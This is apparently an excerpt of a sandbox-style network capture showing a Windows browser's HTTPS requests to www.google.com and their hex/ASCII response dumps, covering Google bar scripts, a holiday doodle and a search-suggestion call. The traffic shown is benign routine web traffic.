                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC372INData Raw: 31 33 36 31 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                            Data Ascii: 1361)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                            Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                            Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                            Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC427INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                            Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC950INData Raw: 33 61 66 0d 0a 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 20 5c 5c 39 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 69 6d 61 67 65 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 76 67 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61
                                                                                                                                                                                                                                                            Data Ascii: 3af\" width\u003d\"24\" style\u003d\"border:none;display:none \\9\"\u003e\u003c\/image\u003e\u003c\/svg\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_a
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 38 30 30 30 0d 0a 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 35 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f
                                                                                                                                                                                                                                                            Data Ascii: 8000_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700305,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30
                                                                                                                                                                                                                                                            Data Ascii: h;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u0
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75
                                                                                                                                                                                                                                                            Data Ascii: instanceof _.Td)return a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocu
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73
                                                                                                                                                                                                                                                            Data Ascii: 003ddocument,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cs


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            91192.168.2.450125142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC369OUTGET /async/ddljson?async=ntp:2,es_dfp:72fefd38 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:59 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC372INData Raw: 39 35 38 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6a 73 6f 6e 22 3a 7b 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 61 6c 74 5f 74 65 78 74 22 3a 22 53 65 61 73 6f 6e 61 6c 20 48 6f 6c 69 64 61 79 73 20 32 30 32 34 22 2c 22 64 61 72 6b 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3a 7b 22 61 6c 74 65 72 6e 61 74 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6c 6e 62 69 66 45 51 53 36 53 6d 34 74 64 33 54 62 78 55 4f 6f 72 51 68 53 7a 61 52 69 76 75 75 72 69 6d 42 4c 35 4e 4a 78 6c 65 79 32 70 71 56 34 5a 63 52 6c 33 36 52 67 47 72 4b 57 4c 45 59 57 32 36 62 73 67 78 55 69 73 31 59 54 76 65 39 53 79 6d 69 6d 76 51 7a 2d 70 30 47 35 55 68
                                                                                                                                                                                                                                                            Data Ascii: 958)]}'{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_large_image":{"alternate_url":"https://lh3.googleusercontent.com/lnbifEQS6Sm4td3TbxUOorQhSzaRivuurimBL5NJxley2pqV4ZcRl36RgGrKWLEYW26bsgxUis1YTve9SymimvQz-p0G5Uh
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1390INData Raw: 6d 61 67 65 5f 6e 61 6d 65 22 3a 22 43 75 73 74 6f 6d 22 2c 22 69 73 5f 61 6e 69 6d 61 74 65 64 5f 67 69 66 22 3a 66 61 6c 73 65 2c 22 6f 76 65 72 6c 61 79 5f 69 63 6f 6e 5f 63 6f 6c 6f 72 22 3a 22 23 39 61 61 30 61 36 22 2c 22 73 6c 6f 74 22 3a 35 34 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 22 2c 22 75 72 6c 22 3a 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 73 65 61 73 6f 6e 61 6c 2d 68 6f 6c 69 64 61 79 73 2d 32 30 32 34 2d 36 37 35 33 36 35 31 38 33 37 31 31 30 33 33 33 2d 36 37 35 32 37 33 33 30 38 30 36 31 39 33 35 34 2d 63 73 74 2e 70 6e 67 22 2c 22 77 69 64 74 68 22 3a 36 30 30 7d 2c 22 64 61 72 6b 5f 6c 6f 67 5f 75 72 6c 22 3a 22 2f 61 73 79 6e 63 2f 64 64 6c 6c 6f 67 3f 61 73 79 6e 63 5c 75 30 30 33 64 64 6f 6f 64 6c 65
                                                                                                                                                                                                                                                            Data Ascii: mage_name":"Custom","is_animated_gif":false,"overlay_icon_color":"#9aa0a6","slot":54,"theme_color":"","url":"/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-6752733080619354-cst.png","width":600},"dark_log_url":"/async/ddllog?async\u003ddoodle
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC637INData Raw: 6f 6e 22 3a 66 61 6c 73 65 2c 22 73 6d 61 6c 6c 5f 69 6d 61 67 65 22 3a 7b 22 61 6c 74 65 72 6e 61 74 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 5f 67 46 73 34 7a 68 70 6c 49 2d 65 43 4d 45 5a 77 62 62 30 42 36 43 62 46 68 38 4d 7a 31 7a 35 49 31 59 46 64 34 73 50 6a 77 35 5a 30 70 6e 79 7a 37 70 65 75 42 52 66 35 49 6d 37 6b 38 33 33 4f 79 73 49 68 42 4f 5f 76 48 76 6a 71 4e 6e 74 75 64 48 49 48 58 4b 6b 63 36 59 35 44 41 65 77 34 76 32 6a 62 30 36 4e 5a 79 69 79 62 77 54 63 49 71 71 6f 67 22 2c 22 68 65 69 67 68 74 22 3a 34 34 2c 22 69 6d 61 67 65 5f 69 64 22 3a 36 37 35 32 37 33 33 30 38 30 36 31 31 38 33 39 2c 22 69 6d 61 67 65 5f 6e 61 6d 65 22 3a 22 53 6d 61 6c 6c
                                                                                                                                                                                                                                                            Data Ascii: on":false,"small_image":{"alternate_url":"https://lh3.googleusercontent.com/d_gFs4zhplI-eCMEZwbb0B6CbFh8Mz1z5I1YFd4sPjw5Z0pnyz7peuBRf5Im7k833OysIhBO_vHvjqNntudHIHXKkc6Y5DAew4v2jb06NZyiybwTcIqqog","height":44,"image_id":6752733080611839,"image_name":"Small
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            92192.168.2.450124142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC384OUTGET /async/ddllog?async=doodle:306735258,slot:22,type:1,cta:0 HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:19:59 GMT
                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC137INData Raw: 38 33 0d 0a 29 5d 7d 27 0a 7b 22 64 64 6c 6c 6f 67 22 3a 7b 22 65 6e 63 6f 64 65 64 5f 65 69 22 3a 22 5f 7a 42 6e 5a 5f 50 49 49 73 36 4c 37 4e 59 50 33 4b 58 55 71 41 4d 22 2c 22 74 61 72 67 65 74 5f 75 72 6c 5f 70 61 72 61 6d 73 22 3a 22 76 65 64 5c 75 30 30 33 64 32 61 68 55 4b 45 77 69 7a 78 4a 36 62 35 62 6d 4b 41 78 58 4f 42 64 73 45 48 64 77 53 46 54 55 51 50 58 6f 45 43 41 41 51 41 41 22 7d 7d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 83)]}'{"ddllog":{"encoded_ei":"_zBnZ_PIIs6L7NYP3KXUqAM","target_url_params":"ved\u003d2ahUKEwizxJ6b5bmKAxXOBdsEHdwSFTUQPXoECAAQAA"}}
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            93192.168.2.450126142.250.181.132443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                            2024-12-21 21:19:59 UTC1266INHTTP/1.1 200 OK
